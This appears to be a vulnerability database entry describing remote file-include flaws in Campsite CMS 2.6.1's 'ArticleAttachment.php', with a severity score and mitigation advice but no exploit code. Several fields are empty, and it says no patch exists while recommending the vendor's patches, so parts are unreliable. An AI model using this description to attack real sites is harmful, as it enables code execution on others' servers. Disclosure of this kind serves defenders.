vendor:
Campsite CMS
by:
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Campsite CMS
Affected Version From: Campsite 2.6.1
Affected Version To: Campsite 2.6.1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Campsite Multiple Remote File-Include Vulnerabilities
The Campsite CMS is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute arbitrary code in the context of the web server. The vulnerability is due to insufficient input validation in the 'ArticleAttachment.php' script. A remote attacker can exploit this issue by sending a specially crafted HTTP request containing a malicious file path to the vulnerable script. Successful exploitation will result in the inclusion of the attacker's file, which will be executed in the context of the web server.
Mitigation:
To mitigate these vulnerabilities, it is recommended to apply the latest patches and updates provided by the vendor. Additionally, it is good security practice to restrict access to the vulnerable script and to implement proper input validation to prevent file inclusion attacks.
